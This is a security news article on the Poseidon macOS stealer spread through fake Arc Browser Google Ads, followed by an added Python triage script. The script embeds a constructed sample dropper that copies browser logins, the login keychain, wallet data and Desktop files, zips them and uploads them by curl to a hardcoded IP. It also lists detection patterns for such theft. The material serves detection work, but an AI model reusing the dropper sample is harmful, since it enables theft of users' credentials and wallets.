
Poseidon Mac stealer found distributed via Google Ads


Researchers at Malwarebytes have discovered a new campaign that distributes a macOS data stealer to unsuspecting users through malicious Google Ads. The stealer dropped by the campaign, dubbed Poseidon, is reportedly under active development as a competitor to Atomic Stealer, a popular macOS data-stealing tool rented to cybercriminals for a hefty $3,000 a month.

This isn't the first time Google Ads have been used to push malware on unsuspecting users, either. According to the researchers, it is the second time in the past couple of months they have seen fake Arc Browser ads used as a lure; the earlier campaign, however, dropped a Windows RAT (remote access trojan) instead of a macOS stealer.

The fake Arc browser ad as seen by the researchers. | Source: Malwarebytes

It all starts with an ad for the Arc Browser, which the researchers traced to an advertiser named "Coles & Co." The ad links to the domain archost.org; users who click it are redirected to arc-download.com, a fake site set up to deliver Arc for macOS only. Arc Browser is made by The Browser Company, whose official download site is arc.net.

The DMG file downloaded from the bogus site resembles the installer The Browser Company provides for the real browser. However, it instructs users to right-click the app and choose Open. That is the override for apps that are not signed with a valid Developer ID and notarized: a double-click on such an app is blocked by Gatekeeper, while right-click > Open offers a dialog that lets the user run it anyway, so the instruction tricks users into bypassing that protection themselves. (A legitimate download passes `codesign -dv --verbose=2` and `spctl --assess --type execute` without that workaround.) Once opened, the fake browser runs code from the Poseidon project that still looks unfinished. The researchers also found a hardcoded IP address in the stealer's data exfiltration command that points to what appears to be a Poseidon-branded control panel login page.

The Poseidon control panel login page on the hardcoded IP address.

The threat actor behind Poseidon goes by the handle Rodrigo4, who announced the new stealer in a post on the XSS underground forum. The service advertises a malware panel with statistics and a builder that lets buyers set a custom name, icon and AppleScript. In terms of functionality, the stealer claims a file grabber, a crypto wallet extractor, a password manager stealer and a browser data collector.
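The capability list above (browser data, password/keychain data, wallets, file grabbing) together with the hardcoded exfiltration IP from the dropper analysis is what an analyst looks for when triaging a payload like this. The script below is an added example and is not code from the article or from Malwarebytes. The AppleScript-style dropper it inspects is constructed here to mimic those traits (staging loot under /tmp, zipping it, POSTing it with curl to the TEST-NET documentation address 203.0.113.10) and is not the real Poseidon code; the marker regexes and the verdict thresholds are illustrative choices, not published Poseidon signatures.

```python
"""Static triage of a suspected macOS stealer dropper (added example).

SAMPLE_PAYLOAD is CONSTRUCTED to resemble an osascript/shell dropper that
collects browser, keychain and wallet data and POSTs it to a hardcoded IP.
It is not real Poseidon code; 203.0.113.10 is a TEST-NET documentation IP.
"""
import re

SAMPLE_PAYLOAD = r'''
-- constructed sample, not real malware
set loot to "/tmp/.loot"
do shell script "mkdir -p " & loot
do shell script "cp \"$HOME/Library/Application Support/Google/Chrome/Default/Login Data\" " & loot
do shell script "cp \"$HOME/Library/Keychains/login.keychain-db\" " & loot
do shell script "cp -R \"$HOME/Library/Application Support/Exodus\" " & loot
do shell script "find \"$HOME/Desktop\" -name '*.txt' -exec cp {} " & loot & " \\;"
do shell script "zip -r /tmp/.loot.zip " & loot
do shell script "curl -X POST -F 'file=@/tmp/.loot.zip' http://203.0.113.10/gate"
'''

# Constructed benign control: a launcher that only opens the real browser.
BENIGN_SAMPLE = r'''
do shell script "open -a Arc"
display notification "Arc is starting"
'''

IPV4 = re.compile(r'\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b')
URL = re.compile(r'https?://[^\s"\'&]+')

# Illustrative marker regexes, one group per capability the stealer advertises.
CAPABILITY_MARKERS = {
    "browser_data": [r"Login Data", r"Cookies",
                     r"Application Support/(Google/Chrome|Firefox|BraveSoftware)"],
    "password_manager": [r"Keychains/login\.keychain",
                         r"security (dump-keychain|find-generic-password)", r"\.kdbx"],
    "crypto_wallet": [r"Exodus", r"Electrum", r"Ledger Live", r"wallet\.dat"],
    "file_grabber": [r"find [^\n]{0,40}(Desktop|Documents|Downloads)",
                     r"-name '\*\.(txt|pdf|docx?)'"],
    "exfil_http_post": [r"curl[^\n]*(-X POST|--data|-F |--upload-file)"],
    "archive_staging": [r"\bzip -r\b", r"\btar -c", r"\bditto -c\b"],
}
COLLECTION = {"browser_data", "password_manager", "crypto_wallet", "file_grabber"}


def extract_network_iocs(text):
    """Return hardcoded URLs and IPv4 literals found in the script.

    A raw IP in an upload command is itself a strong signal: legitimate
    installers talk to hostnames, and a bare IP is what the researchers
    found in Poseidon's exfiltration command.
    """
    return {"urls": sorted(set(URL.findall(text))),
            "ips": sorted(set(IPV4.findall(text)))}


def detect_capabilities(text):
    """Map capability name -> list of marker patterns that matched."""
    found = {}
    for name, patterns in CAPABILITY_MARKERS.items():
        hits = [p for p in patterns if re.search(p, text)]
        if hits:
            found[name] = hits
    return found


def triage(text):
    """Combine collection markers with an exfil channel into a verdict."""
    iocs = extract_network_iocs(text)
    caps = detect_capabilities(text)
    collects = sorted(COLLECTION & set(caps))
    exfil = "exfil_http_post" in caps
    if exfil and len(collects) >= 2:
        verdict = "stealer-like"          # collects credentials and ships them out
    elif exfil or collects:
        verdict = "suspicious"            # one half of the pattern; inspect by hand
    else:
        verdict = "no stealer indicators"
    return {
        "verdict": verdict,
        "collects": collects,
        "hardcoded_ip_exfil": exfil and bool(iocs["ips"]),
        "iocs": iocs,
        "capabilities": caps,
    }


if __name__ == "__main__":
    for label, sample in (("sample_dropper", SAMPLE_PAYLOAD),
                          ("benign_launcher", BENIGN_SAMPLE)):
        r = triage(sample)
        print(f"{label}: {r['verdict']}; collects={r['collects']}; "
              f"ips={r['iocs']['ips']}")
```

Run it against the script extracted from a suspect DMG (for an AppleScript applet, the source usually sits in Contents/Resources/Scripts/main.scpt and can be decompiled with `osadecompile`). The verdict deliberately requires both a collection capability and an exfiltration channel, since a backup script alone touches the same paths without ever POSTing them anywhere.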

Google Ads has been abused to deliver malware for a while, the infamous BumbleBee campaign being one example. These campaigns all follow more or less the same pattern: the ad impersonates popular software from a legitimate company but sends users to a fake site, where they download malware instead.


Yadullah Abidi


Yadullah is a Computer Science graduate who writes/edits/shoots/codes all things cybersecurity, gaming, and tech hardware. When he's not, he streams himself racing virtual cars. He's been writing and reporting on tech and cybersecurity with websites like Candid.Technology and MakeUseOf since 2018. You can contact him here: yadullahabidi@pm.me.
